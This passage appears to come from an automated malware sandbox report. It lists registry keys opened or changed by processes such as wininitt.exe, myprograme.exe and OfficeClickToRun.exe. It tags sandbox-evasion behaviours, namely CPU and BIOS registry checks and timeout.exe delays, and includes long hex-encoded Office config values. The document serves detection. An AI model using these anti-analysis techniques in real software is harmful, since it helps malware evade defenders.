opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wininitt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language myprograme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Integrator.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 OfficeClickToRun.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz OfficeClickToRun.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString OfficeClickToRun.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4364 timeout.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily OfficeClickToRun.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU OfficeClickToRun.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS myprograme.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Integrator.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS OfficeClickToRun.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer myprograme.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion myprograme.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|16" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.9 = 6e66696733385c22203a207b205c224576656e744672657175656e63795c22203a205c224f6e65506f696e745468726565546f4c6573735468616e54776f506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20323030207d2c205c22436f6e66696733395c22203a207b205c224576656e744672657175656e63795c22203a205c224f6e65506f696e745468726565546f4c6573735468616e54776f506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130207d2c205c22436f6e66696734305c22203a207b205c224576656e744672657175656e63795c22203a205c224f6e65506f696e745468726565546f4c6573735468616e54776f506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031207d2c205c22436f6e66696734315c22203a207b205c224576656e744672657175656e63795c22203a205c224f6e65506f696e745468726565546f4c6573735468616e54776f506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696734325c22203a207b205c224576656e744672657175656e63795c22203a205c224f6e65506f696e745468726565546f4c6573735468616e54776f506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696734335c22203a207b205c224576656e744672657175656e63795c22203a205c2254776f506f696e7446697665546f4c6573735468616e5468726565506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031303030207d2c205c22436f6e66696734345c22203a207b205c224576656e744672657175656e63795c22203a205c2254776f506f696e7446697665546f4c6573735468616e5468726565506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20313030207d2c205c22436f6e66696734355c22203a207b205c224576656e744672657175656e63795c22203a205c2254776f506f696e7446697665546f4c6573735468616e5468726565506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130207d2c205c22436f6e66696734365c22203a207b205c224576656e744672657175656e63795c22203a205c2254776f506f696e7446697665546f4c6573735468616e5468726565506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031207d2c205c22436f6e66696734375c22203a207b205c224576656e744672657175656e63795c22203a205c2254776f506f696e7446697665546f4c6573735468616e5468726565506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696734385c22203a207b205c224576656e744672657175656e63795c22203a205c2254776f506f696e7446697665546f4c6573735468616e5468726565506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696734395c22203a207b205c224576656e744672657175656e63795c22203a205c225468726565506f696e7446697665546f4c6573735468616e466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20323030207d2c205c22436f6e66696735305c22203a207b205c224576656e744672657175656e63795c22203a205c225468726565506f696e7446697665546f4c6573735468616e466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20313030207d2c205c22436f6e66696735315c22203a207b205c224576656e744672657175656e63795c22203a205c225468726565506f696e7446697665546f4c6573735468616e466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2032207d2c205c22436f6e66696735325c22203a207b205c224576656e744672657175656e63795c22203a205c225468726565506f696e7446697665546f4c6573735468616e466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031207d2c205c22436f6e66696735335c22203a207b205c224576656e744672657175656e63795c22203a205c225468726565506f696e7446697665546f4c6573735468616e466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696735345c22203a207b205c224576656e744672657175656e63795c22203a205c225468726565506f696e7446697665546f4c6573735468616e466976655c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696735355c22203a207b205c224576656e744672657175656e63795c22203a205c2246697665546f4c6573735468616e536576656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20323030207d2c205c22436f6e66696735365c22203a207b205c224576656e744672657175656e63795c22203a205c2246697665546f4c6573735468616e536576656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20313030207d2c205c22436f6e66696735375c22203a207b205c224576656e744672657175656e63795c22203a205c2246697665546f4c6573735468616e536576656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2032207d2c205c22436f6e66696735385c22203a207b205c224576656e744672657175656e63795c22203a205c2246697665546f4c6573735468616e536576656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696735395c22203a207b205c224576656e744672657175656e63795c22203a205c2246697665546f4c6573735468616e536576656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696736305c22203a207b205c224576656e744672657175656e63795c22203a205c2246697665546f4c6573735468616e536576656e5c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696736315c22203a207b205c224576656e744672657175656e63795c22203a205c22536576656e546f4c6573735468616e4669667465656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20313030207d2c205c22436f6e66696736325c22203a207b205c224576656e744672657175656e63795c22203a205c22536576656e546f4c6573735468616e4669667465656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20313030207d2c205c22436f6e66696736335c22203a207b205c224576656e744672657175656e63795c22203a205c22536576656e546f4c6573735468616e4669667465656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031207d2c205c22436f6e66696736345c22203a207b205c224576656e744672657175656e63795c22203a205c22536576656e546f4c6573735468616e4669667465656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696736355c22203a207b205c224576656e744672657175656e63795c22203a205c22536576656e546f4c6573735468616e4669667465656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696736365c22203a207b205c224576656e744672657175656e63795c22203a205c22536576656e546f4c6573735468616e4669667465656e5c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696736375c22203a207b205c224576656e744672657175656e63795c22203a205c224669667465656e546f4c6573735468616e536576656e7465656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20313030207d2c205c22436f6e66696736385c22203a207b205c224576656e744672657175656e63795c22203a205c224669667465656e546f4c6573735468616e536576656e7465656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203230207d2c205c22436f6e66696736395c22203a207b205c224576656e744672657175656e63795c22203a205c224669667465656e546f4c6573735468616e536576656e7465656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031207d2c205c22436f6e66696737305c22203a207b205c224576656e744672657175656e63795c22203a205c224669667465656e546f4c6573735468616e536576656e7465656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696737315c22203a207b205c224576656e744672657175656e63795c22203a205c224669667465656e546f4c6573735468616e536576656e7465656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696737325c22203a207b205c224576656e744672657175656e63795c22203a205c224669667465656e546f4c6573735468616e536576656e7465656e5c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696737335c22203a207b205c224576656e744672657175656e63795c22203a205c22536576656e7465656e546f4c6573735468616e5468697274795c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20313030207d2c205c22436f6e66696737345c22203a207b205c224576656e744672657175656e63795c22203a205c22536576656e7465656e546f4c6573735468616e5468697274795c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130207d2c205c22436f6e66696737355c22203a207b205c224576656e744672657175656e63795c22203a205c22536576656e7465656e546f4c6573735468616e5468697274795c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031207d2c205c22436f6e66696737365c22203a207b205c224576656e744672657175656e63795c22203a205c22536576656e7465656e546f4c6573735468616e5468697274795c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696737375c22203a207b205c224576656e744672657175656e63795c22203a205c22536576656e7465656e546f4c6573735468616e5468697274795c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696737385c22203a207b205c224576656e744672657175656e63795c22203a205c22536576656e7465656e546f4c6573735468616e5468697274795c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696737395c22203a207b205c224576656e744672657175656e63795c22203a205c22546869727479546f4c6573735468616e4669667479466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20313030207d2c205c22436f6e66696738305c22203a207b205c224576656e744672657175656e63795c22203a205c22546869727479546f4c6573735468616e4669667479466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130207d2c205c22436f6e66696738315c22203a207b205c224576656e744672657175656e63795c22203a205c22546869727479546f4c6573735468616e4669667479466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031207d2c205c22436f6e66696738325c22203a207b205c224576656e744672657175656e63795c22203a205c22546869727479546f4c6573735468616e4669667479466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696738335c22203a207b205c224576656e744672657175656e63795c22203a205c22546869727479546f4c6573735468616e4669667479466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696738345c22203a207b205c224576656e744672657175656e63795c22203a205c22546869727479546f4c6573735468616e4669667479466976655c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696738355c22203a207b205c224576656e744672657175656e63795c22203a205c22477265617465725468616e457175616c546f4669667479466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203230207d2c205c22436f6e66696738365c22203a207b205c224576656e744672657175656e63795c22203a205c22477265617465725468616e457175616c546f4669667479466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130207d2c205c22436f6e66696738375c22203a207b205c224576656e744672657175656e63795c22203a205c22477265617465725468616e457175616c546f4669667479466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696738385c22203a207b205c224576656e74467265717565 OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|9" OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.12 = 616379436c69656e745c22203a207b205c224576656e74735c22203a207b205c22476574446174615c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22536861726564436f6d6d656e74735c22203a207b205c224576656e74735c22203a207b205c22436f6d6d656e74436f6e746578744368616e676564416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f6164436f6d6d656e74416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436c6f7365566965774576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436f6e74657874437265617465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684f70656e566965774576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368566965774368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368426567696e44726166744576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684361706162696c69746965734368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436f6d6d656e74734368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436f6d6d656e7453656c65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368437265617465436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368446f634368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368456e64436f6d6d656e7453657373696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368456e6444726166744576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368466f63757350616e655472696767657265644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368496e6974436f6d6d656e7453657373696f6e4173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368496e697469616c52656e646572436f6d706c657465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368496e76616c69644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684c6f6164546872656164735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636850616e654368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636850616e65466f63757353746174654368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636850616e65546f52656e6465724576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636853656c656374436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636853657448616c6650616e65446973706c61794d6f64655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463685468656d654368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636844656c657465436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469736361726444726166745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c656172436f6d6d656e7453656c656374696f6e416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22486f6d65506167655c22203a207b205c224576656e74735c22203a207b205c22506c6163654368616e6765536c6162436f6e646974696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6e53686f77486f6d65506167655c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c225365617263685c22203a207b205c224576656e74735c22203a207b205c225365656e4279557365725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c224f666669636553746172745c22203a207b205c224576656e74735c22203a207b205c22536574757054656d706c61746550726f706572746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243757272656e745549416374697665506c6163654368616e67655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22547269676765725468756d626e61696c416374696f6e52756e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446f63756d656e744e6f74696669636174696f6e735c22203a207b205c224576656e74735c22203a207b205c2252656769737465724f6e49646c65466561747572654761746544697361626c65645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d7275536572766963654170695c22203a207b205c225375624e616d657370616365735c22203a207b205c22446f63756d656e74735c22203a207b205c224576656e74735c22203a207b205c2252656164526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225772697465526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6e526571756573745375636365656465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22506c616365735c22203a207b205c224576656e74735c22203a207b205c2252656164526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225772697465526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6e526571756573745375636365656465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c224d736f53686172696e675c22203a207b205c224576656e74735c22203a207b205c22434d736f53686172696e675365727669636548656c706572456e64476574486f73744361706162696c69746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572476574486f73744361706162696c69746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e6447657455736572417474726962757465735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c70657247657455736572417474726962757465735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e644765744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c7065724765744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e645365744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c7065725365744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e644765745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c7065724765745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e645365745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c7065725365745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572436865636b5065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c70657247657453686172696e67496e666f726d6174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572426567696e5365745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c70657247657453686172696e6756657273696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d6f6465726e4261636b73746167655c22203a207b205c224576656e74735c22203a207b205c224261636b737461676550616765436f6e74726f6c55736572437265617465436f6e74726f6c557365725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224465736b746f704261636b73746167654e617669676174696f6e5c22203a207b205c224576656e74735c22203a207b205c224e617669676174696f6e5461736b496e766f6b655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225461736b496e766f6b654f6e52656164466f6c6465725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224465736b746f7053686172696e675c22203a207b205c224576656e74735c22203a207b205c22436f6c6c616250616e6555736572536574436f6c6c616250616e654d6f64655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6c6c616250616e6555736572436c69636b53686172696e674c696e6b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6c6c616250616e6555736572497343757272656e74446f63456e746572707269736550726f7465637465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446f63756d656e7473536861726564576974684d655c22203a207b205c224576656e74735c22203a207b205c22446f63756d656e7473536861726564576974684d6552657175657374446f63756d656e7473536861726564576974684d654173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7473536861726564576974684d6552657175657374436163686564446f63756d656e7473536861726564576974684d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7473536861726564576974684d654964656e74697479436163686552657175657374526573756c745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7473536861726564576974684d6552657175657374436163686564446f63756d656e7473466f724661696c757265735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22486973746f727955585c22203a207b205c224576656e74735c22203a207b205c224163746976697479506167654d616e6167657252656769737465725669736962696c697479436f6e74726f6c6c65725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224275734261724f70656e4c6f63616c56657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434163746976697469657341676772656761746f72496e69745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434163746976697469657341676772656761746f7252657475726e4572726f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243437369446f63756d656e74537461746545787465726e616c556e7265676973746572446f63756d656e744c697374656e65725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243486973746f727941637469766974696573466163746f727952656672657368416674657252656e616d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f62616c744163746976697469657346696c6556657273696f6e4c697374557064617465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243536f61704461746150726f7669646572496e69745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616765436c6f73655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616765436f707956657273696f6e5c